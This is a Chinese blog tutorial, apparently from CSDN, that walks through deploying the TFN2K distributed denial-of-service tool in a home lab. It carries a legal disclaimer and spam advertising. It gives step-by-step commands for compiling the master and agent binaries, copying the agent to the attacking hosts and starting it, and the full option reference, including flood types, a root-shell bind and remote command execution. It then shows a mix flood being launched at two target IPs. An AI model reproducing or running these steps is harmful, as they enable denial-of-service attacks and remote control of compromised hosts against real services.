软件TFN 2K的分布式拒绝攻击(DDos)实战详解-CSDN博客

  • 阿里云国际版折扣https://www.yundadi.com

  • 阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6

    写在前头


    本人写这篇博客的目的并不是我想成为黑客或者鼓励大家做损坏任何人安全和利益的事情。因科研需要我学习软件TFN 2K的分布式拒绝攻击只是分享自己的学习过程和经历有助于大家更好的关注到网络安全及网络维护上。

    需要强调的是进行未经授权的网络攻击是非法的违反了法律法规可能导致刑事起诉和重大法律后果。

    一定要尊重法律和道德不要参与或支持任何网络攻击行为。如果你是网络管理员应该采取适当的安全措施来保护你的网络免受DDoS攻击的影响。

    这篇文章仅供技术参考千万不要用其做一些违法操作如果你利用它来做一些不合法的事情那结果与我无关。

    一. TFN 2K概述


    什么是DDos

    DDoS攻击Distributed Denial of Service Attack即分布式拒绝服务攻击。最简单的定义就是多台电脑对一台电脑的攻击占用目标服务器或网络资源的攻击行为

    什么是TFN 2K

    TFN 2K通过主控端利用大量代理端主机的资源进行对一个或多个目标进行协同攻击是DDos的实现工具

    攻击体系

    主控端—运行TFN客户端来遥控并指定攻击目标更改攻击方法

    代理端—被植入并运行TD进程的牺牲品接受TFN的指挥攻击的实施者

    在这里插入图片描述

    TFN 2K特性

    • 主控端通过随机TCPUDPICMP之一的数据包向代理端主机发送命令攻击方法包括TCP/SYNUDPICMP/PING、混合攻击、TARGA3等。
    • 主控端与代理端的通讯采取单向即主控端只向代理端发送命令并且会采取随机的头信息甚至虚拟的源地址信息代理端不会逆向向主控端发送任何信息。

    二. 安装配置


    我在个人本地服务器上部署了几台设备来模拟应用场景。网络拓扑如下需实现Master控制两台Attacker攻击两台Defender

    在这里插入图片描述

    2.1 安装TFN


    在主控端Master下载TFN 2K软件因软件的特殊性本人概不提供相关的下载渠道设下载并解压的文件夹名称为TFN2K

    切换至下载目录对软件进行编译同时设置一个八位数的登录密码

    cd TFN2K/src
    make
    

    编译后即可生成tfntd
    在这里插入图片描述
    登录所有代理端将主机端的td下载到代理端本地

    scp root@192.166.60.1:/root/TFN2K/src/td ./
    scp root@192.166.61.1:/root/TFN2K/src/td ./
    

    td赋权并执行文件此时代理端部署完毕

    chmod 777 td
    ./td
    

    可利用ps -a查看进程发现td已经在运行了
    在这里插入图片描述

    2.2 TFN命令讲解


    可在主控端输入./tfn查看相关参数

    • -P protocol设置服务器通信的协议。可以是ICMPUDPTCP。使用随机协议作为默认值
    • -D n为每个真实的请求发送n个虚假请求以诱骗目标
    • -S hostIp可指定源ip。默认情况下随机欺骗
    • -f hostlist存储TFN的所有主控端的文件名表示其中所有主控端均实现攻击操作
    • -h hostname只利用该主控端发起攻击也就是一对一的攻击后面跟一个主机或IP地址
    • -p portSYN洪泛指定TCP目标端口
    • -c ID攻击参数
      • -c 0 停止攻击
      • -c 1设置反欺骗等级设定用法-i 0完全欺骗到-i 3/24个主机字节欺骗
      • -c 2改变攻击数据包大小用法-i <packet size in bytes>
      • -c 3将根shell绑定到一个指定的端口用法-iremote port
      • -c 4UDP洪水用法-i victim@victim2@victim3@...
      • -c 5TCP/SYN洪水用法-i victim@...[-p目标端口]
      • -c 6ICMP/PING洪水用法-i victim@...
      • -c 7ICMP/SMURF洪水用法-i victim@broadcast@broadcast2@...
      • -c 8MIX flood随机UDP/TCP/ICMP攻击用法-i victim@...
      • -c 9TARGA3洪水IP堆栈渗透用法-i victim@...
      • -c 10盲目执行远程shell命令使用-i命令一般还可用于远程命令控制

    2.3 测试TD


    在实现泛洪攻击前先对所有的代理端进行测试测试其是否可“听从”主控端的安排

    创建host.txt文件用于记录所有运行了./td文件的代理端

    echo "192.166.60.2" > host.txt
    echo "192.166.61.2" > host.txt
    

    操作tfn向所有的代理端实现创建文件夹的命令一般创建的文件夹都和td在同一级目录

    ./tfn -f /root/TFN2K/host.txt -c 10 -i "mkdir TestMakeDir"
    

    查看代理端可知文件夹创建成功表明主控端可操作所有的代理端
    在这里插入图片描述

    三. 攻击


    3.1 准备工作


    先为被攻击服务器安装流量抓包软件在DF1上安装tcpdump

    apt install tcpdump
    

    测试抓取15秒内的流量并输出为文件形式

    tcpdump -i eth1 -w "getFlow.pcap" -G 15
    

    DF2上安装tshark

    apt install tshark
    # 倘若不能安装便先安装wireshark
    apt install wireshark
    

    测试抓取15秒内的流量并输出为文件形式

    tshark -i eth1 -a duration:15 -w "getFlow.pcap"
    

    3.2 发送攻击


    开启流量捕获利用控制端Master向代理端发出攻击请求利用MIX flood攻击DF1DF2

    ./tfn -f /root/TFN2K/host.txt -c 8 -i 192.166.65.1@192.166.66.1
    

    15秒后停止流量攻击

    ./tfn -f /root/TFN2K/host.txt -c 0
    

    3.3 查看结果


    查看DF1中捕获的流量发现存在大量UDPTCP数据流

    tcpdump -r getFlow.pcap
    

    在这里插入图片描述
    因没有直接记录数据大小可以通过ls -l查看文件大小间接来判断捕获的数据流可知确实捕获了大量数据
    在这里插入图片描述
    查看DF2中捕获的流量DF2中更直观表明捕获了约75万个数据流

    tshark -r getFlow.pcap
    

    在这里插入图片描述
    通过ls -l查看文件大小可知确实捕获了大量数据
    在这里插入图片描述

    3.4 解惑


    我们发送的是MIX flood表示随机UDP/TCP/ICMP攻击但是在捕获流量的文件中并没有查看到ICMP类型的流量这是为什么呢

    通过我查阅资料可知ICMP洪泛攻击现已经过时不再有效网络管理员和服务提供商已经采取了各种防护措施包括用于过滤恶意流量的设备和防火墙规则这些自带的防护措施可以检测到大量的ICMP流量并在检测到异常或过多的流量时采取措施以减轻对目标系统的影响。但UDPTCP攻击可能更难检测和阻止因为它们模拟更常见的网络通信模式。

  • 阿里云国际版折扣https://www.yundadi.com

  • 阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6